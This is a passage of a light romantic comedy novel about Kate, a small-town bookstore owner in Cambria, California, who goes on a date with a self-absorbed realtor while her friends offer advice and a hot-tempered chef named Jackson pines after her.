Genevieve, who rented the tiny downstairs apartment on the first floor of Kate's house, owned the Porter Gallery, a small storefront on Main Street that offered fine art as well as the seascape watercolors and ceramic tchotchkes the tourists loved. She was five-foot-two, with fiery red, curly hair that put one in mind of Merida, the Disney princess from _Brave_. Gen and Kate were, in some ways, opposites. While Gen worked out every day without fail, Kate had a vast and impressive array of excuses to avoid the gym. Where Gen was completely at home in a sheath dress and three-inch heels, Kate—as her encounter with Zach had proved—could barely manage in anything but flats. Gen was kale and egg-white omelets; Kate was Froot Loops and Pop-Tarts. Somehow, the contrasts had allowed them to complement each other in a way that had cemented their friendship from the day they'd met.
Gen was already dressed in spandex shorts and a pink, racer-back athletic top, running shoes on her feet, her mass of unruly hair coaxed into a more subdued ponytail. "Come for a run with me?" she said, batting her eyes at Kate over the rim of her cup.
"You've got to be on crack."
"Well, no. But the runner's high is pretty good."
"Get your happy, sunshiny, athletic self out of here before I beat you with a broom."
Gen cocked her head to the side, appraising Kate. "So that's no, then?"
When Gen was gone, Kate took her coffee mug out onto the back deck and sighed as she plopped into an Adirondack chair. The house, though old, small, and in a state of mild disrepair, had one of the best views in Cambria. It sat halfway up a hill that rose above the shoreline, giving the back deck a 180-degree view of the Pacific Ocean. Morning was the best time to enjoy the view, with the sun rising gently in the east. In the afternoon, it would be glaring down on her, prompting her to reach for a sun hat, sunglasses, and, ideally, a large umbrella. Right now, though, it was perfect; in June, the air was cool but not cold even this early in the morning. She could relax in her plaid pajama pants and T-shirt without the need for a sweatshirt or a blanket to keep her comfortable.
As she sipped the strong, sweet brew, she heard sea lions barking from where they perched on the rocks below. Seagulls soared overhead. And on the grassy patch one story below, just outside Gen's back door, a doe grazed, its legs long and graceful. Kate kept quiet so she wouldn't disturb it.
This had to be paradise, and if it wasn't, she couldn't imagine anywhere better. Maybe if she'd been raised here, maybe if she'd grown up in this town on the Central California coast, gone to school here, rode her bicycle on the winding, hilly roads day after day, she might have become so familiar with its beauty that she'd have stopped seeing it. As it was, though, she was thankful every day to find herself here, despite the influx of tourists that disrupted the quiet every summer, despite the struggle of keeping the bookstore running, despite the little things that kept going wrong with the house—the roof that needed repair, the persistent ant problem, the plumbing that made a kind of singing noise when you turned on the water. All of that was insignificant compared with waking up to this.
Kate had inherited the house—and the business—from her mother about five years before. Lydia Bennet had been a housewife for most of her adulthood, but when Kate's father had left her for another woman ten years ago, when Kate was twenty-two, Lydia had taken it as a second chance at making a life of her own. She'd sold their house in Los Angeles, bought this place, and opened the bookstore. Lydia had hired Althea soon afterward.
Because Kate had been busy attending UCLA and then launching her own career teaching college-level English, she'd never lived in Cambria until her mother had died of ovarian cancer. Kate had come up here to feel closer to her mother, to grieve, to heal. Then she'd fallen in love with the place and had never gotten around to leaving.
She went inside for another cup of coffee and checked the clock. She didn't want to be late to the shop again and risk the wrath of Althea. The shop didn't open until ten a.m. on weekdays, but she'd agreed to come in early to meet with Althea to discuss their plans for the annual Cambria Art Walk.
The Art Walk name was misleading; the event had started out, many years ago, as a way for the town to highlight the many local artists who showed their work in Cambria's galleries. Tourists and locals were encouraged to go from gallery to gallery on a warm summer evening, taking in culture and sampling hors d'oeuvres and local wines. Over the years, the event had expanded as more and more local businesses had wanted in on the action. Now, it was more of an open house that ran all up and down Main Street on one night each July. No longer was it limited to art galleries. These days, pretty much everybody—the boutiques, the coffee houses, the souvenir shops, the restaurants, and, of course, the bookstore—offered something special to visitors on the night of the Art Walk. The events and attractions included everything from live music to ceramics demonstrations to food and craft booths set up on the sidewalks. Last year, the toy store down the street had hosted a juggling show that had been a favorite among families with children.
Althea insisted that Swept Away's usual offering—a book reading and signing, with free coffee and cookies—was the correct, and most dignified, way to go. After all, what else would a bookstore do but a reading? It made sense, Kate had to admit, but she couldn't help cringing when she remembered what had happened last year. The local author they'd brought in had been so epically boring, so inept a public speaker, that people had started walking out during the reading. To avoid embarrassing the author—a genuinely nice person and a very talented writer—Kate and Althea had rushed around on the street, finding their friends and using bribes, guilt, and quid-pro-quo promises to fill the modest number of folding chairs they'd set out in the shop. Their efforts had ultimately failed, and the author had slinked away with a crushed ego, pathetic sales, and a bakery box full of leftover cookies that had been purchased for a crowd that hadn't come.
This year, Kate wanted to do something different, something exciting. Unfortunately, she had no idea what it might be. She thought about it as she crunched on a bowl of Frosted Flakes at her kitchen table. She was halfway through the bowl when Gen, sweaty and breathless, poked her head in the front door.
"You should have come, Kate. It's awesome out here."
"Yeah. But why waste all that awesomeness with... you know, panting and sweating."
Gen looked at Kate's breakfast and scrunched up her nose. "You really need to do something about your nutrition."
"Hey," Kate said, changing the subject. "What's the gallery going to do for Art Walk?"
Gen came in and plopped down across from Kate at the table. "Don't know yet. We've got a pretty good show lined up—a local abstract expressionist I'm really excited about—but we need something... else. Something more."
Kate sighed. "I'm having that same problem. Althea wants boring. I don't want to do boring. We tried that last year."
"Ugh," Gen said. "I remember. The pain is still fresh." Her expression brightened suddenly. "Speaking of pain, I hear you ate the floor over at Jitters yesterday in front of Mr. Beautiful." She wiggled her eyebrows.
Kate grimaced. "Word travels fast."
"It does. I also heard that he invited you to have a coffee with him."
Kate got up to take her cereal bowl to the sink. "Did you also hear that he's like a lovesick puppy over his ex-wife?"
Gen slumped a little in her chair. "I heard that. Are you sure, though? I mean, maybe you misinterpreted things."
"He showed me her picture and cried."
Gen opened her mouth to say something, closed it, and looked at Kate. "I have literally no way to spin that to make it sound okay."
Kate waved an arm dismissively. "It doesn't matter. I could never be with a guy that good-looking anyway. I'd constantly feel all sad and frumpy in comparison."
Gen looked at her with sympathy. "You're not sad and frumpy."
"No. I don't think I am. But I would _feel_ that way if I were dating a male supermodel. I'd look like me, like the Kate you're used to seeing, but I'd feel like that elf from Harry Potter. What's his name?"
"Dobby," Gen supplied.
"Right. I'd feel like Dobby."
"Yeah. I get it." Gen sighed. "I could probably manage it, myself."
Kate grinned. "Hey, go for it. Next time we have a red alert, you can be the one to go sprawling all over the floor, see what happens."
"I'll have some knee and elbow pads ready, just in case." Gen frowned. "Wait. That sounds kinky."
"It really does."
Kate looked at the clock, said, "Oh, crap," shooed Gen out, and hurried in to get showered and ready for work. She considered her wardrobe options, wistfully looked at her single pair of high-heeled shoes, remembered the humiliation of the day before, and chose flats instead.
"Althea, we can't just do a book signing. Last year was awful. Do I have to remind you what it was like having to practically abduct people from the street and force them into the shop? I was doing favors for _months_ to pay people back."
Kate and Althea were sitting in the leather club chairs positioned in one corner of the store to give customers somewhere comfortable to read. The seating area was between the biographies and the military histories, just to the left of the diet books. It was an hour before opening, and Kate was holding a yellow legal pad on her lap, pen poised, ready to take notes should they come up with any brilliant ideas for the Art Walk. Which they hadn't yet.
"Yes, but book signings are what bookstores _do_ ," Althea insisted, not unreasonably. "We just need to get a better author this time."
"That's where we went wrong," Kate mused. "Todd Lansing _is_ a good author. He's just not a good speaker. Which we didn't know."
"Well, we do now." Althea shook her head sadly at the memory.
"I'll say."
The legal pad was still blank, its long, yellow pages mocking her.
They both turned at the rap on the front door. Kate peeked through the glass and saw Rose Watkins standing there with a square white plate in her hand. Kate opened the door, and Rose rushed in, already talking.
"You've got to try these. You too, Althea. Tell me what you think, and don't hold back. If these are crap, I've got to know now. Only six weeks until Art Walk! I'm doing a wine and small plate pairing, and these are supposed to go with the merlot, but jeez, I'm not sure. They might go better with a pinot noir, but Jackson says, no, go with the merlot. Here. Eat, eat!"
Rose thrust the plate at them. The manager of De-Vine, the shop two doors down that offered wine tasting along with gourmet food items and various wine-related novelties, Rose was an unusual fit for the small-town atmosphere of Cambria. With her chin-length, purple hair, her nose and eyebrow piercings, and the rose tattoo that just peeked out above the neckline of her black T-shirt, she'd have been more at home in L.A. or New York City. The owner at De-Vine, an elderly woman who favored pink Lacoste polo shirts and pastel pleated slacks, had balked at first when Rose had applied for the job. But when she'd realized how much Rose really did know about wine—that Rose could tell the difference between a Napa cabernet sauvignon and one from Bordeaux simply by aroma—she'd decided that Rose's unconventional appearance was worth getting used to.
Kate peered at the plate and saw two ovals of bruschetta topped with a thin slice of Italian sausage and fennel. She reached out for one, and Rose yanked the plate back.
"Wait! Don't eat that! Just... wait!" She put the plate on a side table and ran out the door and down the street toward the wine shop. Less than two minutes later she was back with two wine glasses in her hand, each bearing an ounce of deep red liquid.
She backed through the door because each hand held a glass, then spun and faced Kate and Althea. "The wine! You've got to have it with the wine, obviously, or how will you know if Jackson is right about the pairing? Now, I'm not going to tell you which wine is which. Just try the wine and the app together." She stopped, presumably for air.
Kate took a bite of bruschetta, followed by a sip from one of the glasses. Then, at Rose's insistence, she took another bite, then a sip from the other glass.
Rose looked at her expectantly. "Well? Which one do you like better?"
Kate wasn't sure she liked either one better than the other—they were both delicious—so she pointed at the glass on the right. "That one." Rose pumped a fist in the air in triumph.
"Okay. Althea, it's your turn."
Althea pursed her lips. "I'm sorry, dear. I don't take wine." She said it in the same tone one might say, _I don't shoot heroin._
Althea reached out for the remaining piece of bruschetta, but Rose slapped her hand away. "You can't have it if you're not going to try it with the wine. Sorry."
She picked up the plate and the two wine glasses and headed back out the door. "Thanks, Kate!"
Kate took a deep breath, locked the front door behind Rose, picked up her legal pad again, and turned to Althea, ready to regroup and resume brainstorming ideas for the Art Walk. She had just managed to utter the words, "So, which authors... " when Jackson Graham tried to barrel his way through the door of the bookstore, found it locked, and pounded on the glass.
Althea opened the door, and Jackson charged in with Rose close behind him. His face was red, and the white apron he wore around his waist was lightly smeared with some kind of sauce. "Who's the idiot who wanted to pair the bruschetta with the pinot noir?"
Kate opened her mouth to speak, closed it, and then said, eloquently, "Uh... " She was rendered speechless by her conflicting emotions. On one hand, she was intimidated by his obvious anger and disdain. On the other, she was immobilized by how absolutely steaming-hot sexy he was when he was mad. Which was most of the time.
"I guess... well... I suppose I'm the idiot," she said, raising her hand as though she were in second grade, waiting for the teacher to call on her but knowing she hadn't done her homework.
"She's not an idiot. She's right," Rose said.
He took one step back. "Oh." He ran a hand through his wavy, chestnut hair. "Well, look, I didn't mean... but, really. The pinot ?"
Jackson was head chef at Neptune, Cambria's most upscale restaurant. Apparently, he was helping Rose create a tasting menu for the Art Walk event. Kate had known Jackson since he'd moved to town three years before—known him in a _wave to each other on the street, give my regards to your aunt_ kind of way. She might have gotten to know him better, but she was so often flustered by the man's tempest-like moods. The way he was looking at her now was hard to interpret. Was he personally offended by her choice of wine, or was he suffering from an annoying rash?
"I don't know anything about food and wine, except... you know, I eat. And sometimes drink. Rose told me to pick one, so I picked one."
He planted his hands on his hips. "Well, you picked the wrong one."
She smiled at him sweetly. "Well, Rose seemed to think I chose correctly, and she _is_ the prodigy."
"I am," Rose said helpfully.
He pointed a finger at Kate. "Just because she knows wine doesn't mean she... Why the hell am I arguing about this with you?" He stomped out of the store. Kate could practically see the steam rising from his ears. Rose winked at Kate and followed him.
"Well, he was certainly worked up," Kate told Althea after he'd left.
"Temperamental," Althea observed, her lips pressed into a judgmental line. "But the man is a genius with seafood and field greens."
# 3
"I can't believe I called her an idiot." Later that night, Jackson sat at the bar at Ted's with Daniel Reed, a local glass artist who had been his friend since Jackson had moved to Cambria three years earlier. Ted's, a somewhat rundown saloon that offered pool, darts, and occasional live music on the weekends, was well off of Main Street, so its clientele was mostly locals rather than the tourists who took over the town every summer. Jackson found tourists to be a necessary annoyance. They paid the bills, but that didn't mean he had to hang out with them during his down time.
Now, Jackson took a deep drink from his beer bottle and ran a hand through his hair. " 'Idiot.' That's what I said. _I'm_ the idiot. Obviously."
Daniel nodded his head. "Can't argue with that. At the very least, your skills with women could use some improvement."
Jackson groaned. "Look. It's not like I'm _pining_ for her or anything."
"Right. You're not pining."
"Of course not."
"And since you're not pining, I'm sure she's got nothing to do with the fact that you haven't dated anyone seriously in three years."
He looked up at Daniel, surprised. "That's not... I've dated. I've dated _a lot_."
"Sure, but it's been quantity, not quality." Daniel looked at Jackson with amusement in his hazel eyes. "You haven't been serious about anyone in three years. Hmm. That's about when you met her, isn't it?"
"Shut up."
"I'm just saying."
"And I'm just saying you should shut your pie hole."
Daniel raised his beer bottle to Jackson in mock salute. "Those people skills, right there, are the ones that are going to win you that woman's heart, mark my words."
Jackson groaned again, and put his head on the bar. "I'm screwed, aren't I?"
"Yep. And not in a good way."
They sat in companionable silence for a while, Daniel drinking, Jackson wallowing in misery.
"What I don't get," Daniel said finally, "is why you haven't made your move yet. You're single. She's single. You've had plenty of opportunity. Looks-wise, you're not completely repellent to women, probably. You're gainfully employed. What's the holdup?"
Jackson lifted his head from the bar and took a drink from his Widmer Hefeweizen, which was almost gone. "She wasn't single when I met her. She was married. And then she was going through a divorce, and I'm not stupid enough to get in the middle of _that._ And then..."
"And then you were so used to adoring her from afar that you didn't know how to change the dynamic."
He shrugged. "I guess."
"And then there's the other thing," Daniel said.
"What other thing?"
"The thing where you're an ill-tempered pain in the ass, and when women figure that out, they tend to run away like their hair's on fire."
"They don't always run away."
"The smart ones do. The ones whose daddies treated them right, taught them to expect better."
Daniel's assessment was so on-target it took Jackson's breath away. It also made him feel more hopeless than ever.
"Well, if I'm such an asshole, maybe I'd be doing her a favor to just forget the whole thing." Suddenly, he really needed another beer. He signaled for one from the bartender.
"Or, there's another alternative," Daniel offered.
"What's that?"
"Just stop being an asshole."
Jackson sighed deeply. "Yeah. Like that's gonna happen."
"There's another wrinkle." Daniel waited expectantly for Jackson to ask.
"Yeah? And what might that be?" He had to raise his voice to be heard over the music being played over the sound system and the loud, drunken chatter of the two guys at the pool table.
"I was over at the gallery yesterday and I heard Gen on the phone talking to Lacy over at Jitters. Seems Kate has decided she's ready to dip a toe back into the dating pool. The girls—Lacy, Gen, and Rose—have been trying to set her up with some guy staying over at the B&B on Washington Street. She had coffee with him." Daniel's eyebrows went up and down.
Jackson glared at him. "From your face, I'd guess 'having coffee' is a euphemism. Please tell me it was real coffee and not... you know. Metaphorical coffee."
Daniel barked out a laugh. "It was real coffee. The good news is, I don't think it went all that well. The bad news is, this guy's apparently some kind of Greek god or Speedo model or something."
Jackson should have been comforted that it hadn't gone well, but he was unaccountably irritable, as though he had a layer of sand under his skin that no amount of scratching would relieve.
"Well, why the hell are they trying to fix her up with him? If the guy's at the B&B, he's not local, so it's not going to go anywhere."
Daniel shrugged. "I think that's part of the appeal."
"What do you mean?"
"Well..." He gestured with his beer bottle. "It makes sense when you think about it. Maybe she's ready for _something_ , but she's not ready for a relationship. So she goes out with the guy, has some fun, he moves on, and now she's back in the game."
"Well, shit." He didn't want to think about her being _back in the game_ , unless he was one of the players.
"Yep." Daniel picked up his beer bottle and clinked it against Jackson's, which sat, ignored, on the bar. "Seems to me she's not going to be the spinster book lady for much longer. Whatever you're gonna do, I'd say you'd better go ahead and do it."
Two days after the Jitters incident, one day after Jackson and Daniel deconstructed said incident at Ted's, Zach—the gorgeous hunk of man with the helpless longing for his ex-wife—came into Kate's bookstore. It was midafternoon, Althea had gone home for the day, and Kate had her head bent over a stack of invoices and an Excel spreadsheet when the bell on the front door started jingling merrily. At first, she didn't look up.
"Welcome to Swept Away," she said automatically, her eyes still on her calculations. "Romance is half off. Please let me know if there's anything I can help you find."
His voice was deep and sensuous when he answered. "Hi, Kate. I like your place."
Kate looked up in surprise. "Oh! Zach! It's nice to see you again. How's your vacation so far?"
"Well, a little lonely, to be honest. I was wondering if you could help me with that."
Was it her imagination, or was there something suggestive in his words? He meant books, surely. He wanted her to liven up his vacation by helping him to find some good reading.
"Um... What kind of genre were you looking for?"
"Genre?" He looked confused. Not a good sign.
"Action, suspense? Crime? Historical fiction? I've got some really great new releases." She came out from behind the counter and started to lead him to the New Fiction section. "What do you usually like to read?"
"Well." He rubbed a hand over the ridiculously sexy stubble on his chin. "I'm not much of a reader, actually. I'm more of an active guy. Hiking. Skiing. That sort of thing."
"Oh." Kate felt a kind of punch in the gut whenever someone told her they didn't read. How was it possible that someone didn't enjoy reading? That was like saying _I don't enjoy breathing_. It just didn't make sense.
"Actually, I..." He chuckled. "I'm trying to get up my courage, here. I came to see you."
"I was wondering if I could take you to dinner. They say Neptune's good. But I'm sure you've been there hundreds of times, since you live here and all."
Kate stood there with a book in her hand, looking at Zach, trying to hide her surprise. After their disastrous meeting at Jitters, she'd assumed he'd go back to wherever he lived and she'd never see him again. He was tall and muscular, with dark, thick hair and eyes like she'd seen on the does that grazed in her backyard. He was wearing a pair of faded Levi's that fit like they'd been made for him, and a muscle-hugging black T-shirt that showed just how devoted he must have been to his gym routine. His obvious heartbreak over his divorce notwithstanding, she should have been excited at the prospect of an evening out with a man who was as physically magnificent as Zach. But all she could think was that she needed to apprise her friends of this latest development as quickly as possible. She thought it would probably be poor manners to whip out her cell phone and spread the news right in front of him.
"Well, this is unexpected," she said, stalling for time. "And you've heard right; Neptune is excellent. The head chef is a friend of mine. Well... _friend_ might be too strong a word."
"So, what do you say?" he asked.
She hesitated. "I'd have thought..."
"Thought what?"
She might as well just say it. "I'd have thought that you wouldn't be looking to date anyone, since you're still in love with your ex."
He nodded his head and avoided her gaze. Then he stuffed his hands into his jeans pockets and looked at his shoes. "Yeah. I just... I just thought it would be nice. I liked talking to you at the coffee place. It was good having someone to listen. I thought maybe we could talk some more, over dinner."
She didn't know what to do, what to say. More than thirty years of female programming had conditioned her never to refuse a date with someone who looked like this. But instinct—informed by the memory of him getting misty-eyed over the photo of his ex—told her to flee like a bunny from a cheetah.
"Let me check my schedule over the next few days and give you a call. Would that be all right?"
"Sure." He pulled a business card from his wallet—Zach Lockwood, Realtor—and handed it over. "It's got my cell and my email. Let me know." Then he smiled at her. The smile, all white teeth and sincerity, definitely worked in his favor.
The minute he was out the door, Kate rushed into the back room to get her cell phone out of her purse. On red alert overload, she didn't know who to call first. She decided it should be Lacy, since she'd orchestrated their meeting at Jitters in the first place.
"Red alert! Red alert!" Kate announced into the phone as soon as Lacy picked up.
"Oh my God! Where?"
"Here! In the store!"
"Right now?"
"No! A few minutes ago! Well, since he's gone now, I guess it's not a red alert anymore. More pink."
"Well, what's the point of a red alert if he's not there anymore? The whole red alert system..."
"He asked me out," Kate interrupted.
Lacy's end of the line was silent.
"What did you tell him?"
"I said I'd check my schedule and get back to him."
" 'Hmm' what? What's the 'hmm'?"
"We need a meeting."
"I can't have a meeting right now. Althea's not here. I'm alone in the store."
"Again with the 'hmm.' "
Lacy ignored that. "I'll call the girls and set up a plan. Call you back."
Lacy called Gen, and Gen called Rose, and both of them called Kate, and when everyone had hashed out their work schedules and evening plans, they all agreed to meet at Kate's house at seven p.m. Lacy would bring the Chinese food. Rose, of course, would bring the wine.
Kate reflected briefly on the sorry state of her love life that it required committee meetings. Did Gwyneth Paltrow need a committee to decide whether she should "consciously uncouple" with Chris Martin? Probably not. But then, she was Gwyneth. Kate was just Kate. And any excuse was a good one to get together with her friends.
# 4
"He's hung up on his ex. He's a tourist, which means he's leaving soon. And he _doesn't read_." Kate held up three fingers, ticking off the reasons she should say no. The four of them had pulled her small dining table out onto the back deck, and they were eating moo shu chicken, egg rolls, and sweet and sour pork as the sun dipped toward the ocean. Rose had selected a German Riesling, and they were most of the way through the first bottle, with a light breeze on their faces and the sound of crashing waves in the background.
"But, God, there's his looks," Gen said. A stray strand of curly red hair had fallen into her face with the breeze, and she pushed it away as she took another sip of wine.
"Yes. The looks count for at least three items on the plus side," Rose said before crunching into an egg roll.
"Also on the plus side," Lacy said, "is the fact that you need practice."
Kate lifted an eyebrow. "Practice?"
"You really do," Rose said, pointing one black-lacquered fingernail at Kate. "You haven't dated anybody since Marcus. And that was, what? Two years ago?"
Marcus Hoffman, Kate's husband for six years, had been a cheater and a manipulator. When he'd finally left, it had been more a relief to Kate than a trauma. But the way he'd treated her for their entire marriage had left her so wounded that she hadn't even been able to think about men until recently. When she'd told her friends that maybe—not for sure, but _maybe_ —she might be ready to get out there again, they'd thrown themselves into the task of shoving the baby bird out of the nest.
"Yes, I have!" Kate demanded. "I've dated!"
"Okay. Name them. Who have you gone out with since Marcus?" Gen asked.
"I... Well..." Kate put up her hands in surrender. "Okay, maybe I haven't dated much since Marcus. But I know how to date."
"Of course you do, honey," Lacy said soothingly, putting a hand on Kate's arm. "But you might be a little rusty, that's all."
Kate stalled by shoveling some more sweet and sour onto her plate and opening the second bottle of Riesling. After she'd poured some into her glass and offered it to the others, she sighed. "So, what we're saying, then, is that Zach could be, what, a refresher course? Fine. But isn't that kind of unfair to him? If I know it's not going anywhere, isn't it wrong for me to use him for practice?"
"No! That's the beauty of the situation!" Rose insisted. "He's going home in a few days, and he's in love with someone else, so he's not planning on it going anywhere anyway!"
Kate considered this. "Well, I guess that's true."
"Look, you're not out to marry him," Rose said as she arranged a delicate moo shu pancake on her plate. "But if you get a nice dinner at Neptune while enjoying a little eye candy, what's the harm?"
Despite the unassailable logic of their arguments, Kate stared into her wine glass and felt glum. "If this is such a great idea, why don't one of you go out with him?"
"He didn't ask us," Gen said. "He asked you."
"You're going," Lacy announced, as though the decision had been hers to make all along. "And then we'll have a post-game debriefing after."
Rose sighed. "I love a good post-game debriefing. Especially if we get to talk about sex."
Kate pointed at her. "We _won't_ be talking about sex. There won't be any sex to talk about. It's a first date. And probably the only one with this guy. Jeez."
"Yeah." Rose seemed to deflate slightly. "Well, maybe we can just talk about sex in general."
"Sure, honey." Kate rubbed her arm. "We can do that."
Kate and Zach met at Neptune at seven p.m. on a Wednesday. Gen had insisted on coming up from her downstairs apartment to help Kate dress for the occasion. She was wearing a silky knee-length slip dress in royal blue with a pair of low-heeled silver sandals. Her dark hair was carefully styled, and the color of the dress brought out the intense blue of her eyes. When she'd finished dressing, Gen had sat back, sighed, and said she looked stunning.
When she walked into Neptune and saw Zach sitting at the bar waiting for her, she had to admit that Gen's choices might have been effective. The look on his face when he took in the sight of her—the way his gaze traveled over every inch of her—suggested that she'd achieved the desired effect.
Falling on her face the first time they'd met might have been good strategy, but she didn't think it would play as well a second time, so she was glad she'd chosen shoes that were attractive but more sensible.
"Kate," he said, standing to meet her. "You look gorgeous."
_So do you,_ she thought. He was wearing a black dress shirt, open at the collar, and black slacks. He was sporting a day or two worth of stubble that gave him a rugged look, as though he'd just come from a day of rock climbing. His dark eyes and chiseled jaw could have come straight out of a _GQ_ ad. Other women in the restaurant were stealing covert looks at him. Some were less covert than others.
He put a hand on her arm. "Shall we get our table?"
"Of course."
He flagged the hostess, an acquaintance of Kate's from her Thursday yoga class. Janie, a tall blonde who proved to be far more strong and flexible than Kate when performing everything from downward dog to the side plank, took them to a table in the center of the room.
"You look fabulous, Kate," Janie said as she seated them and placed menus in front of them.
"Thanks." Kate accepted a menu and got settled into her chair. "It's no thanks to yoga, though. I've missed class the past couple of weeks."
"You should come back," Janie said. As she talked to Kate, her eyes kept cutting toward Zach and the way he looked in a close-fitting shirt. "We've got a new instructor, and she's really good."
"I will."
"I'll tell Jackson you're here. Enjoy your meal!"
Janie swept off to attend to other customers before Kate could protest. She did _not_ want Jackson Graham to know she was here. That's all she needed while on a date—to have him come out and grouse over her choice of wine, or which appetizer she chose to precede which main course. The man thought he was the only one qualified to _eat._
And maybe that wasn't the only reason she would prefer for him to stay safely tucked away in the kitchen. If he came out here to say hello, her female hormones might implode over having both him and Zach in such close proximity. Zach, with his movie star looks, and Jackson, with his—well, everything.
She was in her own world pondering this when she realized Zach was saying something.
"I'm sorry. I was distracted. What was that?"
"I was asking, who's Jackson?"
"Oh, he's the head chef. Jackson Graham."
"And how do you know him?"
Kate arranged the menu in front of her. "It's a small town. Everybody knows everybody."
The waitress—someone Kate also knew, but not well enough to force the need for small talk—came to take their drink order. Zach chose a bottle of wine without asking Kate's opinion. To her horror, it was a white zinfandel. She personally didn't mind drinking white zin, but she knew without a doubt that if Jackson came out to their table to say a friendly hello, there'd be hell to pay. Jackson placed white zinfandel on the same level of taste and sophistication as Red Bull or cherry Kool-Aid, and she knew from her conversations with Rose that he strenuously protested its presence on the Neptune wine menu at all. Well, at least if he came out here spitting fire, she'd be able to say that Zach chose it. The results might be fun. She smiled privately at the thought.
They studied the menu, placed their orders—porterhouse steak for him and sea bass for her—and settled in to begin the excruciating ritual of first-date small talk.
"So, Zach, how long are you staying in Cambria?" Kate sipped at her wine, reflecting that she would have preferred a nice chardonnay.
"Oh, I've gone home already."
She raised her eyebrows at this, surprised. "Really?"
"Yes. I was only at the B&B for a few days. I came back to see you. I live in San Luis Obispo. Less than an hour on Highway 1, and here I am."
Taken aback, Kate said, "Oh."
"Look," he said. "I know I talked a lot about Sherry when we met before. But I really think it's time for me to move on. And I'm very attracted to you."
Suddenly, everything Kate had assumed about this date was no longer true. This... whatever it was didn't have a built-in expiration. He lived close enough to Cambria that a relationship was on the table, if they wanted it. Which she did not. He didn't read, he ordered white zinfandel—and there was also the ex-wife thing. Why was she even here? Then she looked up at his face, which appeared to have been chiseled out of marble. _Oh, right. That's why._ Was she really one of those people who went out with someone just because of their looks? Not entirely. She was here partly because her friends had insisted on it. And they were right about one thing. She did need practice with men.
_It's just dinner. It's practice._
Still, she felt a bit smarmy. Was she using him as arm candy? Was she just like the popular guys she knew in high school who were interested in girls only because of nice hair and a good pair of breasts?
_Okay, I am not interested in him for his breasts._ She felt a hysterical laugh start to bubble up, so she drowned it in white zinfandel.
"What are you thinking?" he asked. "Seems like you've got a lot going on in there." He pointed to his own temple.
"I'm sorry. I'm thinking about the store," she said, covering. "Sales have been down, and we've got a big event coming up that could give us a much-needed boost if I handle it right. I can't screw it up."
"Oh yeah, the Art Walk," he said.
"Right. The thing is, it's kind of turned into a competition. The shop with the most impressive Art Walk event gets bragging rights for the whole year. It's gotten bigger and bigger every year. It's silly, but..."
"You want to win."
She laughed. "Yeah. I really do."
"It's like real estate," he said.
"Really? How so?"
He explained. He began explaining before the entrees arrived, he continued explaining after their plates were placed on the table, and he explained some more as they ate. Kate was halfway through her sea bass while he was still explaining. She suddenly remembered why real estate agents had such a reputation for being blowhards. He told her about his biggest sales, his sales average, how that compared to the sales averages of other Realtors in San Luis Obispo, his strategy during an open house, his strategies for staging, and his philosophies on how to select a client to work with. By the time he got to, "... and the way I look doesn't hurt," Kate was ready to climb out the bathroom window.
She didn't enjoy rejecting men—he didn't seem like a bad guy, after all—but it was clear this wasn't the man for her, even for a fling. She decided to steer the conversation in a direction that might give her a clear way out.
"So, tell me more about your ex-wife."
His face changed, going from arrogant know-it-all to vulnerable child, and Kate hurt for him. "You don't want to talk about her, do you?" he said.
"Well, I just... Back at the store, you said you might need someone to talk to."
So he did. He began with how they'd met, then proceeded with their courtship, wedding, and early years together. By the time he got teary-eyed over the tale of their breakup, Kate was no longer thinking of it as a date. She was thinking of it as somebody comforting a broken-hearted friend. And she was a hell of a lot better at that than she was at dating.
Jackson Graham was in the middle of bitching out the salad chef for a wilted piece of red leaf lettuce when Janie breezed by, mentioning that Kate Bennet was in the restaurant with a date.
The information filtered into his brain in stages. The mention of the name—Kate Bennet—made his hands and feet tingle in a not unpleasant way. But then the next word to penetrate—date—made the blood pound in his ears so that he could no longer hear the excuses being made by the salad chef.
He wrapped up his diatribe with "Just goddamned fix it," and the salad chef took the opportunity to get himself out of sight as quickly as possible.
_Kate Bennet is here with some guy?_
He was torn between his need to see the guy and the impulse to simply throw himself into his work and pretend he'd never heard what Janie had said. When another waitress came into the kitchen and said some local muckety-muck wanted to give Jackson his compliments, he decided it was his opportunity to do a little sleuthing.
Not that he cared what Kate Bennet did, or who she dated.
_Oh, hell, who am I kidding?_
He took off an apron stained with Bearnaise sauce and stormed out of the kitchen in search of the muckety-muck. On his way to the man's table, he searched the dining room with his peripheral vision, and he saw her almost immediately. It was funny how that worked. His eyes were instantly drawn to her wherever she was in the room. He'd have found her if she'd been hiding in a closet, buried under a half-dozen blankets. Something about her energy drew his attention. It always had. It likely always would. The air around her buzzed with electricity, with light. It was impossible not to see her.
The first thing he noticed was that she looked beautiful. No surprise there. The second thing he noticed was that the asshole with her was insanely, stupidly handsome. He felt a surge of anger inside his cave-man brain, wanting to pound the guy into dust right next to Table Five. Since that would have been bad from a career standpoint, he shut down the part of his mind that was glaring red and proceeded to the muckety-muck's table to hear that his portobello risotto was genius. Which it was, obviously.
Having exchanged pleasantries with the local official, who was a city councilman or a county supervisor or some damned thing, he took a moment to weigh his options. He could skulk back to the kitchen and pretend he hadn't seen her. Or he could go by her table on the pretense of inquiring about her meal. At first he leaned toward skulking, but then he got mad at himself, thinking, _Why should I sneak around? This is my damned restaurant._
And so, to spare himself the humiliation of sneaking on his own home territory, where if anyone should be sneaking, it should be _her_ , he took a deep breath, steeled his resolve, and strolled over to her table—it was a stroll rather than a skulk—and presented himself as though he were just doing his job.
"Kate." He smiled, though it felt strange as it was not his usual facial expression, and looked down at her. The next words he had planned to say fled from his brain like sparrows from a nest as he saw how she looked. "Uh... I... wow."
"Hello, Jackson."
She was looking at him expectantly, and he realized he was supposed to say something. "I... um... Janie told me you were here, and I wanted to check and make sure everything was satisfactory."
"It is. The sea bass is delicious." She smiled, and he felt the smile like warm honey spreading through his chest.
He turned to the date and extended his hand. "Jackson Graham. Head chef."
"Zach Lockwood. Kate mentioned you. The food is great."
Kate added, "Zach has really been enjoying this bottle of white zinfandel with his porterhouse steak."
_White goddamned zinfandel? With a goddamned steak?_ There were no words. Such an offense against taste and reason called for violence, but again, there were career concerns to consider. Speechless and outraged, he looked toward Kate, and saw that she was smirking at him, a delicate hand shielding her mouth as she tried to suppress a giggle.
She was playing with him, a state of affairs he would have welcomed under different circumstances.
He took a deep breath and called upon his inner calm.
"You know," he said, turning toward Zach and gesturing toward the bottle on the table, "this isn't one of our better wines. Please allow me to send something out to you as my gift."
"Thanks—that's really nice—but we're enjoying this. Right, Kate?" Zach looked to her for affirmation.
Kate's mirth was barely suppressed. "Oh, yes. It pairs so well with everything. Steak, sea bass... Wouldn't you agree, Jackson?"
